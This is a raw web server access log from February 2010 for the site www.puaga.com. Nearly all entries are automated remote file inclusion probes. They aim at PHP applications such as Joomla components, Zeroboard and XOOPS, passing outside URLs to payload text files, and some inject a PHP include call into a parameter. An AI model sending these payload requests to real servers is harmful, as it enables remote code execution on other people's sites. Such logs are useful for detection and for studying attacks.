125.141.196.78 - - [15/Feb/2010:09:44:22 -0800] "GET /bbs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:09:44:23 -0800] "GET /logs/access.log%20%20//bbs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [15/Feb/2010:09:44:25 -0800] "GET /logs/access_100128.log%20%20/write_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [15/Feb/2010:09:45:12 -0800] "GET /logs/access_100123.log////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:15 -0800] "GET /logs//index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:15 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:15 -0800] "GET /logs//index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:15 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:15 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:15 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:15 -0800] "GET /logs/access_100121.log//index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:15 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:15 -0800] "GET /logs//index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:17 -0800] "GET /logs//index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:17 -0800] "GET /logs/access_100121.log//index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:17 -0800] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:20 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:21 -0800] "GET /logs/access_100123.log//index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:22 -0800] "GET /logs/access_100123.log//index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:09:45:22 -0800] "GET /logs/access_100123.log%20%20//index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [15/Feb/2010:09:45:58 -0800] "GET /logs/access_100208.log////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:09:46:26 -0800] "GET /logs//setup.php?dir=http://www.solutionexchange-un.net.in/en///administrator/components/com_artforms/images/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [15/Feb/2010:09:46:26 -0800] "GET /setup.php?dir=http://www.solutionexchange-un.net.in/en///administrator/components/com_artforms/images/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [15/Feb/2010:09:47:11 -0800] "GET /logs/access_100118.log////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.249.65.6 - - [15/Feb/2010:09:48:13 -0800] "GET /atesh_info/nt.php?t=5089618758 HTTP/1.1" 200 61 "-" "Googlebot-Image/1.0" "www.atesh.info"
77.221.130.15 - - [15/Feb/2010:09:48:28 -0800] "GET /logs/access_100205.log//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:48:28 -0800] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:48:28 -0800] "GET /modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:48:45 -0800] "GET /logs/access_100129.log//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [15/Feb/2010:09:48:51 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [15/Feb/2010:09:48:52 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [15/Feb/2010:09:48:52 -0800] "GET /logs/access_100107.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:48:55 -0800] "GET /logs/access_100201.log%20%20//index2.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:48:55 -0800] "GET /logs//index2.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:48:56 -0800] "GET /index2.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 2875 "-" "Mozilla/5.0" "www.puaga.com"
211.233.89.196 - - [15/Feb/2010:09:49:07 -0800] "GET /logs/access_100202.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:49:16 -0800] "GET /logs/access_100201.log%20%20//index2.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:49:16 -0800] "GET /index2.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 200 2875 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [15/Feb/2010:09:49:16 -0800] "GET /logs//index2.php?_zb_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:49:34 -0800] "GET /modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:49:34 -0800] "GET /logs/access_100205.log//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:49:34 -0800] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:50:07 -0800] "GET /logs/access_100129.log//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:53:33 -0800] "GET /logs/access_100208.log//admin/classes/errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:53:33 -0800] "GET /admin/classes/errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:53:33 -0800] "GET /logs//admin/classes/errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:53:34 -0800] "GET /admin/classes/errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:53:34 -0800] "GET /logs//admin/classes/errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:53:54 -0800] "GET /modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:53:54 -0800] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:53:54 -0800] "GET /logs/access_100205.log%20%20//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:54:10 -0800] "GET /logs//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:54:10 -0800] "GET /modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:54:10 -0800] "GET /logs/access_100205.log%20%20//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:54:16 -0800] "GET /logs/access_100107.log//admin/classes/errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:09:54:16 -0800] "GET /logs/access_100107.log//admin/classes/errors.php?error=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:09:54:32 -0800] "GET /logs/access_100114.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:09:54:32 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:09:54:33 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:09:55:07 -0800] "GET /logs/access_100114.log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:09:55:07 -0800] "GET /?_SERVER%5BDOCUMENT_ROOT%5D=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:09:55:07 -0800] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:55:09 -0800] "GET /logs/access_100114.log%20%20//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:55:13 -0800] "GET /logs/access_100114.log%20%20//modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:09:56:35 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:09:56:36 -0800] "GET /logs/access_100202.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [15/Feb/2010:09:56:38 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:56:53 -0800] "GET /logs/access_100114.log///oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:56:53 -0800] "GET //oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:56:53 -0800] "GET /logs///oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:56:58 -0800] "GET /logs/access_100205.log///oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:57:27 -0800] "GET //oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:57:27 -0800] "GET /logs/access_100114.log///oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:57:27 -0800] "GET /logs///oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [15/Feb/2010:09:57:32 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [15/Feb/2010:09:57:32 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [15/Feb/2010:09:57:32 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.15 - - [15/Feb/2010:09:57:34 -0800] "GET /logs/access_100205.log///oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [15/Feb/2010:09:57:44 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:09:57:45 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:09:57:45 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:09:57:45 -0800] "GET /logs/access_100208.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [15/Feb/2010:09:59:23 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [15/Feb/2010:09:59:23 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [15/Feb/2010:09:59:23 -0800] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [15/Feb/2010:09:59:37 -0800] "GET /logs/access_100117.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:10:01:56 -0800] "GET /logs/access_100114.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:10:03:25 -0800] "GET /file_includer.php?file=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:10:03:25 -0800] "GET /logs//file_includer.php?file=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:10:03:25 -0800] "GET /logs/access_100125.log%20%20//file_includer.php?file=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:10:03:28 -0800] "GET /logs/access_100205.log//skin/zero_vote/error.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:10:03:29 -0800] "GET /skin/zero_vote/error.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:10:03:30 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:10:03:30 -0800] "GET /logs/access_100109.log%20%20//file_includer.php?file=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.201 - - [15/Feb/2010:10:05:59 -0800] "GET /logs/access_100114.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://kuwok.110mb.com/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:10:08:47 -0800] "GET /logs/access_100123.log////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:10:08:48 -0800] "GET ///index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://yestour.net/pass/id.txt? HTTP/1.1" 200 3642 "-" "libwww-perl/5.808" "www.puaga.com"
72.13.93.215 - - [15/Feb/2010:10:08:48 -0800] "GET /logs////index.php?option=com_frontpage&Itemid=1/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://yestour.net/pass/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
174.34.163.101 - - [15/Feb/2010:10:09:27 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [15/Feb/2010:10:09:27 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
174.34.163.101 - - [15/Feb/2010:10:09:28 -0800] "GET /logs/access_100116.log//modules/vwar/admin/admin.php?vwar_root=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:09:59 -0800] "GET /logs/access_100109.log%20%20///comment_modify.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:10:00 -0800] "GET /logs///comment_modify.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [15/Feb/2010:10:10:00 -0800] "GET //comment_modify.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:10:10:01 -0800] "GET /logs/access_100107.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:10:10:01 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:10:10:01 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:10:10:02 -0800] "GET /logs/access_100205.log/bbs/skin/zero_vote/error.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:10:10:03 -0800] "GET /bbs/skin/zero_vote/error.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
61.7.235.75 - - [15/Feb/2010:10:10:04 -0800] "GET /logs/bbs/skin/zero_vote/error.php?dir=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
75.125.186.154 - - [15/Feb/2010:10:10:13 -0800] "GET /logs/access_100203.log%20%20/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [15/Feb/2010:10:10:18 -0800] "GET /logs/access_100128.log%20%20//bbs//bbs/write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
